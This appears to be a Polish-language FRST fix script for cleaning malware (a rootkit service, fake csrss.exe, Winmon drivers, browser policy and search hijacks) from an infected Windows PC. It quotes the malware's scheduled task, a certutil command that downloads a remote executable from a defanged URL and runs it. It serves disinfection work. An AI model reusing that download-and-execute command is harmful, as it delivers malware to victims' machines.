CloseProcesses:
CreateRestorePoint:
EmptyTemp:
File: C:\Windows\SysWOW64\UMonit64.exe
HKLM-x32\...\Run: [] => [X]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
HKU\S-1-5-21-492948417-1032459766-3818769861-1001\...\MountPoints2: {62a5c64b-50c1-11e9-890e-00c2c6129fc0} - G:\setup.EXE /AUTORUN
GroupPolicy: Ograniczenia - Chrome <==== UWAGA
CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
Tcpip\..\Interfaces\{31FA2C18-586F-4806-8CEF-0361A4014C75}: [DhcpNameServer] 62.179.1.62 62.179.1.63
HKU\S-1-5-21-492948417-1032459766-3818769861-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ6pYKN4-eHvvjJjcR3zq0yy9W_P298GHnrpUoFmrYvpGMgO3zfAdK1v6btob-CwoelSVPgsnL_IN0mPaAqmJtqQBNVaMBTIakJ6x2sUFd42wteUDVrqdzmNZOS_fZFwvnlZfFZWtv1qGkSfJ9cScjuaIi-GkTW&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope - brak wartości
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [Brak pliku]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [Brak pliku]
CHR Extension: (chrome_filter) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjnfeepnpepciddfhjdmkccfahlpkobh [2019-03-27]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2014-05-08]
HKLM\SYSTEM\CurrentControlSet\Services\dump_8E422A00 <==== UWAGA (Rootkit!)
"{BADF48B7-2B43-4589-A8EE-C7FFACD75F4C}" => serwis został odblokowany. <==== UWAGA
"{BADF48B7-2B43-4589-A8EE-C7FFACD75F4C}" => serwis został odblokowany. <==== UWAGA
S2 AdobeARMservice; "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" [X]
S4 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S4 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
S2 rcdll; C:\Users\Martin\AppData\Local\Temp\rcdll.exe [X] <==== UWAGA
S2 symsrv; C:\Program Files\windows nt\symsrv.exe [X]
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] <==== UWAGA (zerobajtowy plik/folder)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] Windows (R) Win 7 DDK provider <==== UWAGA (zerobajtowy plik/folder)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-03-27] (WDKTestCert Admin,131666266076831434 -> ) [Brak podpisu cyfrowego]
NETSVC: Ms8E422A00App -> Brak ścieżki do pliku.
Task: {66CECEA7-D19B-4059-857B-17AD391A875E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://bestmaps.club/app/app.exe C:\Users\Martin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Martin\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
Task: {80C6C728-C16B-4E0A-9619-C2AC5AC5F8AF} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe () [Brak podpisu cyfrowego] <==== UWAGA
Task: {D57ABF40-0270-4D72-95F7-35CF2899A884} - System32\Tasks\wKernelCrash => C:\Users\Martin\AppData\Roaming\Microsoft\Windows\\wKernelCrash.exe () [Brak podpisu cyfrowego]
MSCONFIG\startupreg: FrostySky => "C:\Windows\rss\csrss.exe"
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{4B8D1B83-4A55-48F2-B22C-09736FD10C74}] => (Allow) C:\Users\Martin\AppData\Local\Temp\download\MiniThunderPlatform.exe Brak pliku
FirewallRules: [{B02FC99F-7AA5-41F8-93EC-4FD260DD3106}] => (Allow) C:\Users\Martin\AppData\Local\Temp\download\MiniThunderPlatform.exe Brak pliku
FirewallRules: [{B0870142-1111-4BE8-8DA3-C56635F92949}] => (Allow) C:\Users\Martin\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe Brak pliku
FirewallRules: [{68DCD8DD-AFA8-4C4A-836D-B7656869E2C9}] => (Allow) C:\Windows\rss\csrss.exe () [Brak podpisu cyfrowego]
FirewallRules: [{61F6D31F-46FF-4878-B1B4-B1334C432B3E}] => (Allow) C:\Windows\rss\csrss.exe () [Brak podpisu cyfrowego]
FirewallRules: [{37C149C5-13E2-4218-A94F-936ECF089ECC}] => (Allow) C:\Users\Martin\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe Brak pliku